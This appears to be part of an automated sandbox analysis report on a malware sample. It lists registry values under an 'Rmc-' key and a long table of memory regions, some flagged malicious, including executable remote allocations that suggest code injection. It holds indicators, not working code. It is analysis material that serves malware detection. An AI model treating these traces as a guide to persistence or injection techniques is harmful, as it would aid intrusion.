exepath
HKEY_CURRENT_USER\Software\Rmc-M3P7YT
licence
HKEY_CURRENT_USER\Software\Rmc-M3P7YT
time
There are 456 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
239E000
stack
page read and write
malicious
3389000
trusted library allocation
page read and write
malicious
65E1000
trusted library allocation
page read and write
malicious
891000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
3BAE000
stack
page read and write
B1E000
stack
page read and write
4CBE000
stack
page read and write
154000
trusted library allocation
page read and write
26DE000
trusted library allocation
page read and write
AB0000
trusted library allocation
page read and write
230E000
stack
page read and write
590000
trusted library allocation
page read and write
4EFE000
stack
page read and write
53D000
stack
page read and write
AC0000
trusted library allocation
page read and write
9E2000
trusted library allocation
page read and write
4E5E000
stack
page read and write
4F5D000
stack
page read and write
A90000
trusted library allocation
page read and write
490000
trusted library allocation
page read and write
5D8D000
stack
page read and write
25D3000
trusted library allocation
page read and write
10000
heap
page read and write
42A0000
trusted library allocation
page read and write
1BA000
trusted library allocation
page read and write
401D000
stack
page read and write
6C4000
heap
page read and write
7CF000
heap
page read and write
ABC000
stack
page read and write
5B0000
trusted library allocation
page execute and read and write
263E000
heap
page read and write
3679000
trusted library allocation
page read and write
26E9000
trusted library allocation
page read and write
650000
trusted library allocation
page read and write
26D6000
heap
page read and write
630000
heap
page read and write
26B6000
trusted library allocation
page read and write
26A1000
heap
page read and write
4ACE000
stack
page read and write
37A0000
heap
page read and write
2D3B000
heap
page read and write
150000
trusted library allocation
page read and write
7C7000
heap
page read and write
600D000
stack
page read and write
5F2E000
stack
page read and write
185000
trusted library allocation
page execute and read and write
2668000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
61E000
stack
page read and write | page guard
4A8B000
stack
page read and write
504000
heap
page read and write
68B000
heap
page read and write
2B0000
trusted library allocation
page read and write
565000
heap
page read and write
4230000
trusted library allocation
page read and write
23FB000
stack
page read and write
A10000
trusted library allocation
page read and write
6231000
heap
page read and write
499000
trusted library allocation
page read and write
2A4F000
stack
page read and write
4AFE000
stack
page read and write
3830000
heap
page read and write
40F0000
heap
page read and write
498F000
stack
page read and write
3DC000
stack
page read and write
2D24000
heap
page read and write
BFB000
stack
page read and write
62FE000
stack
page read and write
25BC000
trusted library allocation
page read and write
247F000
stack
page read and write
4550000
heap
page execute and read and write
268C000
trusted library allocation
page read and write
660000
trusted library allocation
page read and write
5CB000
heap
page read and write
350000
heap
page read and write
4F0000
trusted library allocation
page read and write
CBE000
stack
page read and write
26B4000
trusted library allocation
page read and write
4BAE000
stack
page read and write
4B8000
heap
page read and write
208000
trusted library allocation
page read and write
267F000
heap
page read and write
2D18000
heap
page read and write
26BA000
heap
page read and write
629F000
stack
page read and write
343E000
stack
page read and write
5CA000
heap
page read and write
1F14000
heap
page read and write
440000
trusted library allocation
page read and write
2BCC000
stack
page read and write
2939000
trusted library allocation
page read and write
26C6000
heap
page read and write
358000
heap
page read and write
4BF0000
heap
page read and write
4E4D000
stack
page read and write
26AE000
heap
page read and write
4EF000
stack
page read and write
B02000
trusted library allocation
page read and write
5AF000
heap
page read and write
3B0000
trusted library allocation
page read and write
28E4000
trusted library allocation
page read and write
5DFE000
stack
page read and write
267D000
heap
page read and write
DB000
stack
page read and write
7C8000
heap
page read and write
2988000
trusted library allocation
page read and write
265E000
heap
page read and write
66D000
heap
page read and write
478000
remote allocation
page execute and read and write
1F32000
heap
page read and write
2686000
heap
page read and write
4BEE000
stack
page read and write
AD0000
trusted library allocation
page execute and read and write
5C0000
heap
page read and write
28C000
stack
page read and write
2671000
heap
page read and write
5D0000
heap
page read and write
43C0000
trusted library allocation
page execute and read and write
288F000
stack
page read and write
25FA000
trusted library allocation
page read and write
875000
heap
page read and write
670000
trusted library allocation
page read and write
4556000
heap
page execute and read and write
23A3000
trusted library allocation
page read and write
AA0000
trusted library allocation
page read and write
B8E000
stack
page read and write
4FE4000
heap
page read and write
42A0000
trusted library allocation
page read and write
4B4F000
stack
page read and write
2D40000
heap
page read and write
43BB000
stack
page read and write
3F0000
heap
page read and write
263F000
stack
page read and write
617E000
stack
page read and write
160000
trusted library allocation
page read and write
28FC000
trusted library allocation
page read and write
42A0000
trusted library allocation
page read and write
26CD000
heap
page read and write
67F000
heap
page read and write
5A0000
heap
page read and write
290000
heap
page read and write
4F8A000
heap
page read and write
4A0000
trusted library allocation
page read and write
2362000
heap
page read and write
5C0000
heap
page read and write
5D0D000
stack
page read and write
2620000
heap
page read and write
15D000
trusted library allocation
page execute and read and write
4F88000
heap
page read and write
2665000
heap
page read and write
2260000
heap
page read and write
7AE000
stack
page read and write
30DE000
stack
page read and write
29E000
stack
page read and write
5D0000
trusted library allocation
page read and write
2D10000
heap
page read and write
333000
trusted library allocation
page read and write
2D3B000
heap
page read and write
26A7000
heap
page read and write
2BFE000
trusted library allocation
page read and write
57F000
stack
page read and write
7C8000
heap
page read and write
268E000
heap
page read and write
26B3000
heap
page read and write
210000
trusted library allocation
page execute and read and write
2476000
heap
page execute and read and write
5E5E000
stack
page read and write
5C42000
heap
page read and write
2F60000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
2D03000
heap
page read and write
27CE000
stack
page read and write
264D000
heap
page read and write
34C9000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
50F000
heap
page read and write
42A0000
trusted library allocation
page read and write
575000
heap
page read and write
A5C000
stack
page read and write
293C000
trusted library allocation
page read and write
4FFD000
heap
page read and write
2D24000
heap
page read and write
B5D000
stack
page read and write
396D000
stack
page read and write
2651000
trusted library allocation
page read and write
5AF000
heap
page read and write
50C0000
heap
page read and write
170000
heap
page read and write
4F8D000
heap
page read and write
2666000
trusted library allocation
page read and write
2848000
trusted library allocation
page read and write
680000
heap
page read and write
4B0000
heap
page read and write
5C6000
heap
page read and write
25D7000
trusted library allocation
page read and write
89000
stack
page read and write
2D1E000
heap
page read and write
5E60000
heap
page read and write
45CD000
stack
page read and write
2659000
heap
page read and write
BCA000
stack
page read and write
150000
heap
page read and write
5CA000
heap
page read and write
378F000
stack
page read and write
27C000
stack
page read and write
5C20000
heap
page read and write
252F000
stack
page read and write
28FE000
stack
page read and write
42A0000
trusted library allocation
page read and write
8AA000
heap
page read and write
7C0000
heap
page read and write
190000
trusted library allocation
page read and write
5FF000
heap
page read and write
2FC000
stack
page read and write
7CB000
heap
page read and write
2CFC000
heap
page read and write
1DF0000
direct allocation
page read and write
2340000
heap
page read and write
26BF000
heap
page read and write
4F60000
heap
page read and write
26B0000
trusted library allocation
page read and write
26C2000
trusted library allocation
page read and write
4A80000
heap
page read and write
4A0000
trusted library allocation
page read and write
4E7000
heap
page read and write
3EAD000
stack
page read and write
10000
heap
page read and write
B1F000
stack
page read and write
5C82000
heap
page read and write
9C000
stack
page read and write
2610000
heap
page execute and read and write
37EC000
stack
page read and write
42A0000
trusted library allocation
page read and write
6521000
trusted library allocation
page read and write
2659000
heap
page read and write
48E000
stack
page read and write
5B2000
heap
page read and write
9F0000
trusted library allocation
page read and write
632000
heap
page read and write
644000
heap
page read and write
4E9E000
stack
page read and write
264F000
heap
page read and write
468E000
stack
page read and write
337000
trusted library allocation
page read and write
2A0000
trusted library allocation
page execute and read and write
2470000
heap
page execute and read and write
266E000
heap
page read and write
2D42000
heap
page read and write
48E000
stack
page read and write
263D000
heap
page read and write
5BA000
heap
page read and write
3694000
heap
page read and write
2D3B000
heap
page read and write
2F5E000
stack
page read and write
9F0000
trusted library allocation
page read and write
364F000
stack
page read and write
266A000
heap
page read and write
339000
trusted library allocation
page read and write
268A000
trusted library allocation
page read and write
26CB000
heap
page read and write
4C1E000
stack
page read and write
264D000
heap
page read and write
606E000
stack
page read and write
2682000
heap
page read and write
4E0000
heap
page read and write
637000
heap
page read and write
2D40000
heap
page read and write
640000
trusted library allocation
page read and write
5C64000
heap
page read and write
69F000
heap
page read and write
140000
trusted library allocation
page read and write
210F000
stack
page read and write
368F000
heap
page read and write
2344000
heap
page read and write
42A0000
trusted library allocation
page read and write
20000
heap
page read and write
4420000
trusted library allocation
page read and write
1A3000
trusted library allocation
page execute and read and write
2D41000
heap
page read and write
563000
heap
page read and write
2B50000
heap
page read and write
17A000
heap
page read and write
18A000
stack
page read and write
42A0000
trusted library allocation
page read and write
182000
trusted library allocation
page read and write
3A70000
heap
page read and write
1A4000
trusted library allocation
page read and write
2C90000
heap
page read and write
5C24000
heap
page read and write
88C000
heap
page read and write
4430000
trusted library allocation
page read and write
2683000
heap
page read and write
290000
heap
page read and write
200E000
stack
page read and write
250000
heap
page read and write
B70000
trusted library allocation
page read and write
1D5000
trusted library allocation
page execute and read and write
7CF000
heap
page read and write
3FE000
stack
page read and write
382F000
stack
page read and write
294F000
stack
page read and write
A70000
trusted library allocation
page read and write
10000
heap
page read and write
2D20000
heap
page read and write
24DF000
stack
page read and write
4F7C000
heap
page read and write
243D000
stack
page read and write
474000
remote allocation
page execute and read and write
360000
trusted library allocation
page execute and read and write
4E6D000
heap
page read and write
10000
heap
page read and write
264A000
heap
page read and write
26BC000
trusted library allocation
page read and write
679000
heap
page read and write
516E000
stack
page read and write
24B0000
heap
page read and write
257000
stack
page read and write
330000
heap
page read and write
4D90000
heap
page read and write
3361000
trusted library allocation
page read and write
A60000
trusted library allocation
page read and write
366D000
heap
page read and write
2F60000
trusted library allocation
page read and write
3BD000
stack
page read and write
2C7000
stack
page read and write
257F000
stack
page read and write
5F90000
heap
page read and write
335E000
stack
page read and write
3651000
trusted library allocation
page read and write
585000
heap
page read and write
330000
trusted library allocation
page read and write
5CCE000
stack
page read and write
672000
heap
page read and write
187000
trusted library allocation
page execute and read and write
61F000
stack
page read and write
1E8E000
stack
page read and write
3A6F000
stack
page read and write
C28000
heap
page read and write
156000
heap
page read and write
42A0000
trusted library allocation
page read and write
2691000
heap
page read and write
566000
heap
page read and write
422C000
stack
page read and write
2664000
trusted library allocation
page read and write
269A000
heap
page read and write
2F60000
trusted library allocation
page read and write
4B0E000
stack
page read and write
42A0000
trusted library allocation
page read and write
5D6E000
stack
page read and write
5CA000
heap
page read and write
67D000
heap
page read and write
63E000
heap
page read and write
300000
heap
page read and write
50C0000
heap
page read and write
C0B000
stack
page read and write
2A50000
trusted library allocation
page read and write
448E000
stack
page read and write
42A0000
trusted library allocation
page read and write
4C6F000
stack
page read and write
2F5E000
stack
page read and write
5DDE000
stack
page read and write
44E000
stack
page read and write
2BE8000
heap
page read and write
26C6000
heap
page read and write
9EF000
stack
page read and write
2D40000
heap
page read and write
5E7E000
stack
page read and write
5F2000
heap
page read and write
5C0000
heap
page read and write
46DB000
stack
page read and write
2D0000
heap
page execute and read and write
AC0000
trusted library allocation
page read and write
2D60000
heap
page read and write
4BAF000
stack
page read and write
B20000
heap
page read and write
223E000
stack
page read and write
4D6000
heap
page read and write
2CCE000
stack
page read and write
10000
heap
page read and write
2683000
heap
page read and write
4A6E000
stack
page read and write
27E8000
trusted library allocation
page read and write
42A0000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
4F50000
heap
page read and write
38A9000
trusted library allocation
page read and write
20000
heap
page read and write
2D1D000
heap
page read and write
490000
heap
page read and write
2679000
heap
page read and write
2C91000
heap
page read and write
530000
heap
page read and write
2BEB000
heap
page read and write
5C0000
heap
page read and write
3EE000
stack
page read and write
2BE0000
heap
page read and write
501000
heap
page read and write
4A2B000
stack
page read and write
220000
trusted library allocation
page read and write
508E000
stack
page read and write
1F10000
heap
page read and write
580000
trusted library allocation
page read and write
C20000
heap
page read and write
2683000
heap
page read and write
4D93000
heap
page read and write
1DC000
stack
page read and write
21EE000
stack
page read and write
3CAD000
stack
page read and write
4C6E000
stack
page read and write | page guard
42C0000
heap
page read and write
3DAF000
stack
page read and write
2FD000
stack
page read and write
42A0000
heap
page read and write
5C0000
trusted library allocation
page read and write
580000
heap
page read and write
25FC000
trusted library allocation
page read and write
857000
heap
page read and write
42A0000
trusted library allocation
page read and write
6300000
trusted library section
page read and write
267D000
heap
page read and write
6220000
heap
page read and write
268B000
trusted library allocation
page read and write
490000
trusted library allocation
page read and write
1F8E000
stack
page read and write
3FAF000
stack
page read and write
1D0000
trusted library allocation
page read and write
5E6000
heap
page read and write
1AC000
stack
page read and write
850000
heap
page read and write
2656000
heap
page read and write
263E000
heap
page read and write
153000
trusted library allocation
page execute and read and write
5A8000
heap
page read and write
249B000
trusted library allocation
page read and write
613E000
stack
page read and write
330000
heap
page read and write
2644000
heap
page read and write
2BE4000
heap
page read and write
266A000
trusted library allocation
page read and write
4E0E000
stack
page read and write
630000
trusted library allocation
page read and write
AE0000
heap
page read and write
28AD000
trusted library allocation
page read and write
5CEE000
stack
page read and write
59B000
heap
page read and write
662000
heap
page read and write
A00000
trusted library allocation
page read and write
264D000
heap
page read and write
2DDE000
stack
page read and write
5C5000
heap
page read and write
2662000
trusted library allocation
page read and write
631000
heap
page read and write
A00000
trusted library allocation
page read and write
C45000
heap
page read and write
49DD000
stack
page read and write
B00000
trusted library allocation
page read and write
620000
trusted library allocation
page read and write
7EF20000
trusted library allocation
page execute and read and write
3650000
heap
page read and write
7CC000
heap
page read and write
295A000
trusted library allocation
page read and write
5C0000
heap
page read and write
441E000
stack
page read and write
4EE000
stack
page read and write | page guard
4230000
trusted library allocation
page read and write
2676000
heap
page read and write
4D4E000
stack
page read and write
5F4000
heap
page read and write
B60000
trusted library allocation
page read and write
A4C000
stack
page read and write
50D000
heap
page read and write
3C0000
heap
page read and write
2B4E000
stack
page read and write
380000
heap
page read and write
4230000
trusted library allocation
page read and write
2647000
heap
page read and write
D5D000
stack
page read and write
2D24000
heap
page read and write
51D000
heap
page read and write
2671000
heap
page read and write
42A0000
trusted library allocation
page read and write
4AD000
heap
page read and write
2D17000
heap
page read and write
42A9000
trusted library allocation
page read and write
2641000
heap
page read and write
26D2000
heap
page read and write
25C6000
trusted library allocation
page read and write
B4D000
stack
page read and write
26C6000
trusted library allocation
page read and write
267E000
heap
page read and write
AD0000
trusted library allocation
page read and write
2B0000
heap
page read and write
3AE000
stack
page read and write
286000
stack
page read and write
2B7000
heap
page read and write
264A000
heap
page read and write
B80000
trusted library allocation
page execute and read and write
25FD000
stack
page read and write
9E5000
trusted library allocation
page read and write
4FA5000
heap
page read and write
1A0000
trusted library allocation
page read and write
4E50000
heap
page read and write
1D2000
trusted library allocation
page read and write
29F6000
trusted library allocation
page read and write
5BC000
stack
page read and write
29F000
stack
page read and write
340000
trusted library allocation
page read and write
2652000
heap
page read and write
4F5000
heap
page read and write
2361000
trusted library allocation
page read and write
43D0000
trusted library allocation
page read and write
1AD000
trusted library allocation
page execute and read and write
5C60000
heap
page read and write
68F000
heap
page read and write
16A000
trusted library allocation
page read and write
277E000
stack
page read and write
264A000
heap
page read and write
367F000
heap
page read and write
5D7000
heap
page read and write
42A0000
trusted library allocation
page read and write
There are 511 hidden memdumps, click here to show them.